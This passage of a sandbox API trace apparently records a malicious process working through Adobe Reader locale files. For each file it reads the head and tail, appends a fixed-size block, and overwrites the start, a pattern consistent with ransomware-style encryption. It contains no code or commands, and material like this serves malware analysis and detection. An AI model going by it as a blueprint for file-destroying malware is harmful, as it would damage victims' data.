lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0085.846] CloseHandle (hObject=0x204) returned 1 [0085.846] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\Search.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\search.sve"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0085.847] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0085.847] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x5c00 [0085.847] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0085.847] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.847] ReleaseMutex (hMutex=0x168) returned 1 [0085.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.SVE", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0085.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.SVE", cchWideChar=10, lpMultiByteStr=0x1f735ec, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Search.SVE", lpUsedDefaultChar=0x0) returned 10 [0085.848] ReadFile (in: hFile=0x204, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.871] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x4c00 [0085.872] ReadFile (in: hFile=0x204, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.872] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x4c00 [0085.872] WriteFile (in: hFile=0x204, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.873] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0085.873] WriteFile (in: hFile=0x204, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.873] CloseHandle (hObject=0x204) returned 1 [0085.874] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\Acroform.TUR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\acroform.tur"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0085.874] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0085.874] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x61200 [0085.875] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0085.875] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.875] ReleaseMutex (hMutex=0x168) returned 1 [0085.875] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.TUR", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.875] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.TUR", cchWideChar=12, lpMultiByteStr=0x1f7352c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Acroform.TUR", lpUsedDefaultChar=0x0) returned 12 [0085.875] ReadFile (in: hFile=0x204, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x359f278*=0x8000, lpOverlapped=0x0) returned 1 [0085.878] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x60200 [0085.878] ReadFile (in: hFile=0x204, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.880] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x60200 [0085.880] WriteFile (in: hFile=0x204, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.881] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0085.881] WriteFile (in: hFile=0x204, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x359f28c*=0x8000, lpOverlapped=0x0) returned 1 [0085.881] CloseHandle (hObject=0x204) returned 1 [0085.881] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\EScript.TUR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\escript.tur"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0085.882] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0085.882] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xa000 [0085.882] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0085.882] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.883] ReleaseMutex (hMutex=0x168) returned 1 [0085.883] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.TUR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0085.883] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.TUR", cchWideChar=11, lpMultiByteStr=0x1f735ec, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EScript.TUR", lpUsedDefaultChar=0x0) returned 11 [0085.883] ReadFile (in: hFile=0x204, lpBuffer=0x1ea6888, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0085.886] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x9000 [0085.887] ReadFile (in: hFile=0x204, lpBuffer=0x288f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.887] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x9000 [0085.887] WriteFile (in: hFile=0x204, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.887] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0085.888] WriteFile (in: hFile=0x204, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0085.888] CloseHandle (hObject=0x204) returned 1 [0085.889] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\Reflow.TUR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\reflow.tur"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0085.889] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0085.889] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1200 [0085.890] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0085.890] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.890] ReleaseMutex (hMutex=0x168) returned 1 [0085.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Reflow.TUR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0085.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Reflow.TUR", cchWideChar=10, lpMultiByteStr=0x1f7352c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reflow.TUR", lpUsedDefaultChar=0x0) returned 10 [0085.890] ReadFile (in: hFile=0x204, lpBuffer=0x1ea6888, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesRead=0x359f2bc*=0x1200, lpOverlapped=0x0) returned 1 [0085.894] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0085.894] WriteFile (in: hFile=0x204, lpBuffer=0x2664368*, nNumberOfBytesToWrite=0x1788, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2664368*, lpNumberOfBytesWritten=0x359f2d0*=0x1788, lpOverlapped=0x0) returned 1 [0085.894] CloseHandle (hObject=0x204) returned 1 [0085.895] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\Weblink.TUR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\weblink.tur"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0085.895] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0085.896] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x6c00 [0085.896] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0085.896] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.896] ReleaseMutex (hMutex=0x168) returned 1 [0085.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Weblink.TUR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0085.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Weblink.TUR", cchWideChar=11, lpMultiByteStr=0x1f735ac, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Weblink.TUR", lpUsedDefaultChar=0x0) returned 11 [0085.896] ReadFile (in: hFile=0x204, lpBuffer=0x1ea6888, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.137] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x5c00 [0086.137] ReadFile (in: hFile=0x204, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.140] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x5c00 [0086.152] WriteFile (in: hFile=0x204, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0086.171] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0086.171] WriteFile (in: hFile=0x204, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0086.171] CloseHandle (hObject=0x204) returned 1 [0086.172] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\DVA.UKR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\uk_ua\\dva.ukr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0086.172] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0086.173] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x4800 [0086.173] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0086.173] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0086.173] ReleaseMutex (hMutex=0x168) returned 1 [0086.173] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.UKR", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0086.173] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.UKR", cchWideChar=7, lpMultiByteStr=0x1f7ac0c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DVA.UKR", lpUsedDefaultChar=0x0) returned 7 [0086.173] ReadFile (in: hFile=0x204, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.176] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x3800 [0086.176] ReadFile (in: hFile=0x204, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.176] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x3800 [0086.177] WriteFile (in: hFile=0x204, lpBuffer=0x26663c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x26663c8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0086.177] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0086.177] WriteFile (in: hFile=0x204, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0086.177] CloseHandle (hObject=0x204) returned 1 [0086.177] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\RdLang32.UKR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\uk_ua\\rdlang32.ukr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0086.178] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0086.178] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x14d800 [0086.178] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0086.179] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0086.179] ReleaseMutex (hMutex=0x168) returned 1 [0086.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.UKR", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.UKR", cchWideChar=12, lpMultiByteStr=0x1f7352c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RdLang32.UKR", lpUsedDefaultChar=0x0) returned 12 [0086.179] ReadFile (in: hFile=0x204, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0086.182] ReadFile (in: hFile=0x204, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.185] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x14c800 [0086.185] ReadFile (in: hFile=0x204, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.186] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x14c800 [0086.187] WriteFile (in: hFile=0x204, lpBuffer=0x28a19a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28a19a8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0086.187] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0086.187] WriteFile (in: hFile=0x204, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0086.188] WriteFile (in: hFile=0x204, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0086.188] CloseHandle (hObject=0x204) returned 1 [0086.189] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\Spelling.UKR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\uk_ua\\spelling.ukr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0086.190] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0086.190] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x2800 [0086.190] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0086.190] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0086.191] ReleaseMutex (hMutex=0x168) returned 1 [0086.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.UKR", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.UKR", cchWideChar=12, lpMultiByteStr=0x1f7342c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Spelling.UKR", lpUsedDefaultChar=0x0) returned 12 [0086.191] ReadFile (in: hFile=0x204, lpBuffer=0x2665398, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2665398*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.195] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1800 [0086.195] ReadFile (in: hFile=0x204, lpBuffer=0x2665398, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2665398*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.197] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1800 [0086.198] WriteFile (in: hFile=0x204, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0086.198] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0086.198] WriteFile (in: hFile=0x204, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, 